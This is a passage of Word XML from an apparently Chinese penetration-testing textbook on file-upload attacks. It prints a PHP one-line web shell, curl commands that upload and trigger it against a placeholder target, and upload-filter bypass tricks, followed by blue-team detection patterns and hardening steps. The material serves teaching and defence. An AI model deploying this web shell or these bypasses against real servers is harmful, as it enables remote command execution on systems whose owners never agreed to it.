        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（上传）和第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 17 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（Metasploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">手工</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">payload）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">动机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在获得管理员凭证或发现文件上传功能后，上传一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一句话木马），从而在目标服务器上执行任意命令——这是从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">层进入系统层的转折点。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">技术原理直觉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用允许用户上传文件（如头像、附件），但未对文件类型、内容做充分校验。攻击者上传一个包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php system($_GET['cmd']); ?&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件，然后通过浏览器访问该文件并传递</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令，即实现了远程代码执行（RCE）——这违反了“用户输入在执行前必须经过安全校验和清洗”的安全原则①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">实操命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 1. 手工创建一个 PHP 一句话木马（简化的教学示例③，仅限授权靶机使用）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;?php system($_GET["cmd"]); ?&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell.php</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 2. 通过 Web 应用的文件上传接口上传 shell.php</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># （此处用 curl 模拟文件上传，实际参数名/路径因靶机而异②）</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-F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"file=@shell.php"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/upload.php ②</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 3. 找到上传后的文件路径（通常在上一步的响应中，或通过目录爆破）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 访问 http://&lt;TARGET_IP&gt;/uploads/shell.php?cmd=id</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"http://&lt;TARGET_IP&gt;/uploads/shell.php?cmd=id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ②</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 4. 若上传功能对 .php 扩展名有过滤，尝试以下绕过（因靶机而异②③）：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># - 改扩展名为 .php3, .phtml, .phar, .php.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># - 使用双扩展名 shell.php.jpg</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># - 在文件名中插入空字节（已不适用于现代 PHP）shell.php%00.jpg</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># - 伪造 MIME 类型（Content-Type: image/jpeg）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象要点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">访问</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">shell.php?cmd=id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若成功，页面应返回类似</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=33(www-data) gid=33(www-data) groups=33(www-data)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的内容，证明已获得低权限</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用户</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Shell。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若上传被拦截（返回“不支持的文件类型”），按照上述绕过方法逐一尝试。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">常见报错与排错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上传后访问</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">404：说明上传目录不对或文件未成功写入。尝试用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gobuster </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/uploads/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/images/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/files/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等路径。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Web Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不执行命令：可能是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">system</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">exec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">函数被</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">disable_functions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">禁用。尝试使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">passthru</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">shell_exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，或者上传一个更完整的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">webshell（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">p0wny-shell）③。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上传时提示“只允许图片”：可能需要制作图片马（在真实图片中嵌入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代码），或结合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实现代码执行（由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包含上传的“图片”文件）③。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">【防御对照框</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤五】</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队检测与修复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测（IDS/WAF）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：监控上传请求中是否包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP/ASP/JSP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等可执行代码特征（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">eval(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。注意攻击者可能使用编码/混淆，所以需配合沙箱行为分析。在文件系统层面，使用文件完整性监控（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">AIDE/Tripwire）检测</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目录下出现的新</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件（见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 19.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">告警</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：关联</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">访问日志中刚上传的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件随后被</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求并带有可疑参数（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?cmd=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）的行为。这通常在时间上高度相关（上传后数秒内即访问），是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">投放的强特征②。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">修复（加固）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; a)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">上传文件类型白名单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：仅允许业务必需的文件类型（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">image/jpeg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">image/png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），拒绝所有可执行脚本类型①。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; b)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">重命名与存储隔离</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：上传的文件不应保留原始文件名，应使用随机生成的文件名（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">UUID）存储，且上传目录应配置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">不执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚本（在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Apache </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">php_admin_flag engine off</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.htaccess</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">禁用执行）①。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; c)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">恶意代码扫描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：将上传文件传递给</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ClamAV </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
